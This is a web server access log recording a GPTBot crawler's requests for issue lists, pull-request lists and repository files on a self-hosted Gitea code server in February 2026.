"/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/install.sh" -[17/Feb/2026:19:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11218] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:19:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" -[17/Feb/2026:19:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:19:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:19:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=latest&state=closed&type=all" -[17/Feb/2026:19:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11364] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:19:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11360] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:19:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:19:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2f.vscode%2fc_cpp_properties.json" [Client 74.7.227.38] [Length 18537] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11310] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:19:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11306] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:19:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14287] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:19:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 14008] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:19:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 14287] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:19:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 13040] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:19:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:40:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" -[17/Feb/2026:19:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:40:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 